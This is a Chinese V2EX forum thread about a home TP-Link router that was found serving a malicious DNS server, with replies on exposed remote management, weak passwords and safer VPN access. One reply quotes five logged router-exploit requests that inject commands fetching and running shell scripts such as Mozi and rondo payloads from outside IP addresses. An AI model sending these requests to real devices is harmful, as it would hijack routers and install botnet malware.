国庆回老家突然发现路由器下发了恶意的 dns - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
programApe
V2EX    宽带症候群

国庆回老家突然发现路由器下发了恶意的 dns

  •  
  •   programApe 7 天前 3846 次点击

    路由器是 TP-LINK,路由器密码也不是我以前记的那个了。

    16 条回复    2025-10-07 20:36:29 +08:00
    anson264556364
        1
    anson264556364  
       7 天前
    然后呢?
    programApe
        2
    programApe  
    OP
       7 天前
    @anson264556364 密码和以前设置的不一样了,等晚上亲戚回去把设备重置下看看,感觉可能是 tp-link 远程管理有漏洞。
    allplay
        3
    allplay  
       7 天前 via Android
    tp link 远程管理?你从 wan 口进入?
    这是找死,迟早的事
    allplay
        4
    allplay  
       7 天前 via Android
    应该 vpn 或者内网穿透,然后 lan 设备去管理它
    shum02
        5
    shum02  
       7 天前
    以前遇到过家里的 padavan 被恶意改了 DNS ,公网进去改的应该是。
    xyz3210
        6
    xyz3210  
       7 天前
    我是桥接的!
    ks3825
        7
    ks3825  
       7 天前 via Android
    @shum02 查到原因了吗?弱口令?
    2397613259qqq
        8
    2397613259qqq  
       7 天前
    从外回家管理路由最佳实践是 vpn ,或者 ssh tunnel ,不要直接暴露管理入口在公网上,路由器这种东西没有及时更新很容易被滥用
    dpx
        9
    dpx  
       7 天前
    服务器经常会收到一些利用漏洞攻击路由器的请求如
    /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh)

    /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://49.130.26.13:39255/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1

    /cgi-bin/shortcut_telnet.cgi?wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wyu.sh%7Csh%26

    /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1

    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh%3B%27
    shum02
        10
    shum02  
       6 天前
    @ks3825 没,我觉得是弱口令被爆破,padavan 那个认证也没有安全限制的,可以一直爆破
    titanium98118
        11
    titanium98118  
       6 天前 via Android
    80 端口能通吗?
    programApe
        12
    programApe  
    OP
       5 天前
    @titanium98118 不通,老家的网,没弄公网 ip 、没 ipv6 、没桥接。可能的原因是 tp-link 的那个物联 app 管理,或者是装宽带的小哥干的?目前也只有这两种可能性了。
    ks3825
        13
    ks3825  
       5 天前 via Android
    @shum02 是把路由器登陆界面开放给公网了吗?正常是没爆破机会的啊。而且 web 界面暴露出去还有概率被运营商发函警告
    shum02
        14
    shum02  
       4 天前
    @ks3825 嗯,以前是开了的,我这不管的,反正以前的联通和移动公网都是不管开 web 的
    ks3825
        15
    ks3825  
       4 天前 via Android
    @shum02 还是关上吧,太哈人了,padavan 也不算是大型的积极被维护的项目,保不准有什么漏洞,直接向公网开放端口太危险了
    aru
        16
    aru  
       3 天前
    似乎某些路由器固件有漏洞
    当你访问恶意网站的时候会被上面的脚本发起内网 http 请求修改路由器配置
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     6045 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 35ms UTC 03:04 PVG 11:04 LAX 20:04 JFK 23:04
    Do have faith in what you're doing.
    ubao snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86